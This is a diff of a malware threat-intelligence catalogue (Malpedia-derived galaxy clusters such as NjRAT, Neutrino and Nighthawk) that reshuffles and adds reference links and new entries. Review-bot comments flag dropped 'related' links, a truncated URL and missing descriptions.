+ "https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html",
+ "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html",
+ "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html",
+ "https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg",
+ "https://www.amnesty.org/en/latest/research/2020/06/india-human-rights-defenders-targeted-by-a-coordinated-spyware-operation/",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
],
"synonyms": [
"NetWeird",
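Review bot: the re-added `https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.` ends in a bare `.`, which looks like a truncated file extension; since the NetWire list is being regenerated anyway, verify the full URL before keeping it. The new additions (lmntrix, loginsoft, Check Point TrickGate, The Register seizure report, Spamhaus Q3 2022, the second Google Drive link) are otherwise fine, though the Google Drive refs give no hint of what they contain.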
@@ -33732,22 +35560,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron",
- "https://www.ncsc.gov.uk/alerts/turla-group-malware",
"https://www.secureworks.com/research/threat-profiles/iron-hunter",
+ "https://www.ncsc.gov.uk/alerts/turla-group-malware",
"https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "5c2eeaec-25e3-11e8-9d28-7f64aba5b173",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "101c2c0e-c082-4b5a-b820-2da789e839d9",
"value": "Neuron"
},
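Review bot: the Neuron cluster loses its `related` link to `5c2eeaec-25e3-11e8-9d28-7f64aba5b173` (tagged almost-certain) in this hunk; unless the commit message explains that the relation was retired or moved, this reads as an unintended side effect of the regeneration and should be restored.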
@@ -33756,19 +35575,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino",
- "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
- "https://web.archive.org/web/20191223034907/http://blog.ptsecurity.com/2019/08/finding-neutrino.html",
- "http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html",
- "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/",
- "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/",
- "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/",
- "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/",
- "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet",
"https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/",
- "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/22",
+ "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet",
+ "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/",
+ "http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html",
"http://blog.ptsecurity.com/2019/08/finding-neutrino.html",
- "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex"
+ "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/22",
+ "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/",
+ "https://web.archive.org/web/20191223034907/http://blog.ptsecurity.com/2019/08/finding-neutrino.html",
+ "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/",
+ "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
+ "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html",
+ "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/"
],
"synonyms": [
"Kasidet"
@@ -33809,12 +35628,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat",
+ "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
+ "https://securelist.com/cycldek-bridging-the-air-gap/97157/",
"https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/",
"https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations",
- "https://securelist.com/cycldek-bridging-the-air-gap/97157/",
- "https://meltx0r.github.io/tech/2020/02/12/goblin-panda-apt.html",
- "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
"https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view",
+ "https://meltx0r.github.io/tech/2020/02/12/goblin-panda-apt.html",
"https://medium.com/@Sebdraven/goblin-panda-continues-to-target-vietnam-bc2f0f56dcd6"
],
"synonyms": [],
@@ -33841,8 +35660,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings",
- "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html",
"https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
+ "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html",
"https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/"
],
"synonyms": [],
@@ -33861,15 +35680,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "5abc6792-be17-48ee-a765-29cffa4242ee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "1d32e7c3-840e-4247-b28b-818cb1c4ae7c",
"value": "NewsReels"
},
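Review bot: the `related` block linking NewsReels to `5abc6792-be17-48ee-a765-29cffa4242ee` is removed here with nothing else in the hunk changing; check whether the exporter dropped `related` globally, because the other clusters in this patch lose the same block, and either restore it or document the removal.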
@@ -33878,25 +35688,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct",
- "https://www.secureworks.com/research/threat-profiles/bronze-express",
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf",
+ "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
"http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf",
- "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/"
+ "https://www.secureworks.com/research/threat-profiles/bronze-express",
+ "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf"
],
"synonyms": [
"CT"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "c5e3766c-9527-47c3-94db-f10de2c56248",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "ec50a75e-81f0-48b3-b1df-215eac646421",
"value": "NewCT"
},
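Review bot: NewCT loses its `related` link to `c5e3766c-9527-47c3-94db-f10de2c56248` in the same way as several other clusters in this patch; if this is deliberate, a single line in the commit message saying that `related` is no longer emitted for this galaxy would save reviewers from flagging each hunk, and if it is not, the block should come back.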
@@ -33932,8 +35733,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb",
- "https://research.checkpoint.com/ramnits-network-proxy-servers/",
- "https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html"
+ "https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html",
+ "https://research.checkpoint.com/ramnits-network-proxy-servers/"
],
"synonyms": [
"Grobios"
@@ -33970,19 +35771,36 @@
"uuid": "5a998606-a9a9-42ad-affb-9be37e11ec25",
"value": "Nibiru"
},
+ {
+ "description": "C2 framework.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nighthawk",
+ "https://github.com/struppigel/hedgehog-tools/blob/main/nighthawk_str_decoder.py",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
+ "https://github.com/kevoreilly/CAPEv2/blob/master/modules/processing/parsers/CAPE/Nighthawk.py",
+ "https://www.proofpoint.com/us/blog/threat-insight/nighthawk-and-coming-pentest-tool-likely-gain-threat-actor-notice",
+ "https://web.archive.org/web/20220505170100/https://suspicious.actor/2022/05/05/mdsec-nighthawk-study.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c8b9aa40-9c55-4283-851c-635673f87182",
+ "value": "Nighthawk"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nightsky",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.bleepingcomputer.com/news/security/night-sky-is-the-latest-ransomware-targeting-corporate-networks/",
- "https://twitter.com/cglyer/status/1480742363991580674",
"https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
+ "https://twitter.com/cglyer/status/1480742363991580674",
+ "https://twitter.com/cglyer/status/1480734487000453121",
"https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation",
+ "https://www.bleepingcomputer.com/news/security/night-sky-is-the-latest-ransomware-targeting-corporate-networks/",
"https://www.youtube.com/watch?v=Yzt_zOO8pDM",
"https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/",
- "https://twitter.com/cglyer/status/1480734487000453121"
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself"
],
"synonyms": [
"Night Sky"
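Review bot: the new Nighthawk cluster carries only `"description": "C2 framework."`, which says nothing about who sells it or why it is tracked; the Proofpoint ref in the list already covers that, so a sentence noting it is a commercial pentest framework observed being abused would make the entry useful. The two archived/live `suspicious.actor` and Medium links are fine as supporting refs.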
@@ -34006,6 +35824,19 @@
"uuid": "b52a6512-7b0c-431a-8680-93f12921ba46",
"value": "NimbleMamba "
},
+ {
+ "description": "According to the author, Nimbo-C2 is yet another (simple and lightweight) C2 framework. The agent currently supports Windows x64 only. It's written in Nim, with some usage of .NET (by dynamically loading the CLR to the process).",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimbo_c2",
+ "https://github.com/itaymigdal/Nimbo-C2"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "bda7efa0-e08d-453e-95d4-9307c5104a69",
+ "value": "Nimbo-C2"
+ },
{
"description": "Malware written in Nim, stealing data including discord tokens from browsers, exfiltrating the results via a Discord webhook.",
"meta": {
@@ -34052,6 +35883,7 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol",
"https://en.wikipedia.org/wiki/Nitol_botnet",
"https://krebsonsecurity.com/tag/nitol/",
+ "https://asec.ahnlab.com/en/44504/",
"https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/"
],
"synonyms": [],
@@ -34065,10 +35897,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nitro",
- "https://twitter.com/malwrhunterteam/status/1430616882231578624",
- "https://www.bleepingcomputer.com/news/security/discord-nitro-gift-codes-now-demanded-as-ransomware-payments/",
"https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf",
- "https://github.com/nightfallgt/nitro-ransomware"
+ "https://github.com/nightfallgt/nitro-ransomware",
+ "https://www.bleepingcomputer.com/news/security/discord-nitro-gift-codes-now-demanded-as-ransomware-payments/",
+ "https://twitter.com/malwrhunterteam/status/1430616882231578624"
],
"synonyms": [
"Hydra"
@@ -34109,84 +35941,81 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control",
- "https://www.4hou.com/posts/VoPM",
- "https://asec.ahnlab.com/1369",
- "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt",
- "https://ti.360.net/blog/articles/analysis-of-apt-c-27/",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/",
- "https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf",
- "https://blog.talosintelligence.com/2021/07/sidecopy.html",
- "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
- "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
- "https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware",
- "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
- "https://news.sophos.com/en-us/2020/05/14/raticate/",
- "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
- "https://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
- "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA",
- "https://github.com/itsKindred/malware-analysis-writeups/blob/master/bashar-bachir-chain/bashar-bachir-analysis.pdf",
+ "https://attack.mitre.org/groups/G0096",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
"https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://forensicitguy.github.io/njrat-installed-from-msi/",
- "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
- "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains",
- "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/",
- "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
- "https://labs.k7computing.com/?p=21904",
- "https://blog.reversinglabs.com/blog/rats-in-the-library",
- "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.njRAT",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf",
"https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g",
"https://twitter.com/ESETresearch/status/1449132020613922828",
- "https://cyberandramen.net/2022/01/12/analysis-of-njrat-powerpoint-macros/",
- "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
- "https://intel471.com/blog/privateloader-malware",
- "https://cybergeeks.tech/just-another-analysis-of-the-njrat-malware-a-step-by-step-approach/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
"https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf",
- "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html",
"https://blogs.360.cn/post/APT-C-44.html",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
- "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479",
- "https://blog.morphisec.com/syk-crypter-discord",
+ "https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf",
"https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://attack.mitre.org/groups/G0096",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://www.trendmicro.com/en_us/research/20/i/wind-up-windscribe-vpn-bundled-with-backdoor.html",
- "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/",
- "http://blogs.360.cn/post/analysis-of-apt-c-37.html",
- "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html",
+ "https://blog.reversinglabs.com/blog/rats-in-the-library",
+ "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services",
+ "https://forensicitguy.github.io/njrat-installed-from-msi/",
+ "https://ti.360.net/blog/articles/analysis-of-apt-c-27/",
+ "https://labs.k7computing.com/?p=21904",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control",
+ "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
+ "https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
+ "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.njRAT",
+ "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt",
+ "https://blog.morphisec.com/syk-crypter-discord",
+ "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/",
+ "https://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://www.4hou.com/posts/VoPM",
+ "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/",
+ "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks",
"https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/",
- "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf"
+ "https://github.com/itsKindred/malware-analysis-writeups/blob/master/bashar-bachir-chain/bashar-bachir-analysis.pdf",
+ "https://di.sclosu.re/en/njrat-malware-spreading-through-discord-cdn-and-facebook-ads/",
+ "http://blogs.360.cn/post/analysis-of-apt-c-37.html",
+ "https://cybergeeks.tech/just-another-analysis-of-the-njrat-malware-a-step-by-step-approach/",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
+ "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
+ "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
+ "https://asec.ahnlab.com/1369",
+ "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/",
+ "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA",
+ "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
+ "https://cyberandramen.net/2022/01/12/analysis-of-njrat-powerpoint-macros/",
+ "https://www.trendmicro.com/en_us/research/23/a/earth-bogle-campaigns-target-middle-east-with-geopolitical-lures.html",
+ "https://www.trendmicro.com/en_us/research/20/i/wind-up-windscribe-vpn-bundled-with-backdoor.html",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://blog.talosintelligence.com/2021/07/sidecopy.html",
+ "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html"
],
"synonyms": [
- "Bladabindi"
+ "Bladabindi",
+ "Lime-Worm"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "a860d257-4a39-47ec-9230-94cac67ebf7e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b",
"value": "NjRAT"
},
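Review bot: the `related` block that linked NjRAT to dest-uuid a860d257-4a39-47ec-9230-94cac67ebf7e (tagged `estimative-language:likelihood-probability="almost-certain"`, type `similar`) is dropped with no replacement, and the same silent removal happens for Nokki, Nymaim, OddJob, Odinaff, OLDBAIT and Olympic Destroyer further down; if `related` is no longer emitted by design, the commit message should say so, because consumers that resolve these cross-galaxy links will lose them without warning. Two smaller points in the refs: the Talos SideCopy PDF is still listed twice, once bare (`.../062521_SideCopy_%281%29.pdf`) and once with the `?1625657388` cache-buster, so one copy should go; and although the ref list is rewritten almost wholesale, only five URLs are actually new (Check Point, two Spamhaus botnet updates, di.sclosu.re and the Trend Micro Earth Bogle post) plus the `Lime-Worm` synonym, with `attack.mitre.org/groups/G0096` merely moved, which the reordering hides.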
@@ -34221,23 +36050,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki",
- "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf"
+ "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "9e4fd0d3-9736-421c-b1e1-96c1d3665c80",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "f3cbe9ca-e65e-41af-8eb2-1e9877434124",
"value": "Nokki"
},
@@ -34246,9 +36066,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nokoyawa",
+ "https://www.zscaler.com/blogs/security-research/nevada-ransomware-yet-another-nokayawa-variant",
+ "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
+ "https://www.zscaler.com/blogs/security-research/nokoyawa-ransomware-rust-or-bust",
+ "https://malgamy.github.io/malware-analysis/Nokoyawa/",
"https://www.trendmicro.com/en_us/research/22/c/nokoyawa-ransomware-possibly-related-to-hive-.html",
"https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/"
+ "https://github.com/MalGamy/YARA_Rules/blob/main/Nokoyawa.yara"
],
"synonyms": [],
"type": []
@@ -34256,6 +36080,20 @@
"uuid": "934a633a-21f7-4010-a83a-0b64c365355d",
"value": "Nokoyawa Ransomware"
},
+ {
+ "description": "A wiper that overwrites target files with itself, thus spreading in virus-fashion.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nominatus_toxic_battery",
+ "https://twitter.com/struppigel/status/1501473254787198977",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/wipermania-an-all-you-can-wipe-buffet.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2fef9561-e16f-47a9-90c6-a68a1b20cc95",
+ "value": "NominatusToxicBattery"
+ },
{
"description": "An open source C2 framework intended for pentest and red teaming activities.",
"meta": {
@@ -34269,13 +36107,26 @@
"uuid": "b783b185-e05c-481b-8c04-d0ba1b745713",
"value": "NorthStar"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nosu",
+ "https://www.bitsight.com/blog/cova-and-nosu-new-loader-spreads-new-stealer"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a67b25dd-527f-40fa-b7e0-c93e856c0a4c",
+ "value": "Nosu"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.noxplayer",
- "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf"
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/"
],
"synonyms": [],
"type": []
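Review bot: the new Nosu cluster lands with `"description": ""` while the other clusters this patch adds (Nimbo-C2, NominatusToxicBattery, Nullmixer) carry one; the Bitsight post it references (`cova-and-nosu-new-loader-spreads-new-stealer`) is enough to source a one-line description, which is what users see in the galaxy UI. The noxplayer part of this hunk is a pure swap of two existing refs.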
@@ -34300,9 +36151,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom",
- "https://twitter.com/malwrhunterteam/status/910952333084971008",
"https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/",
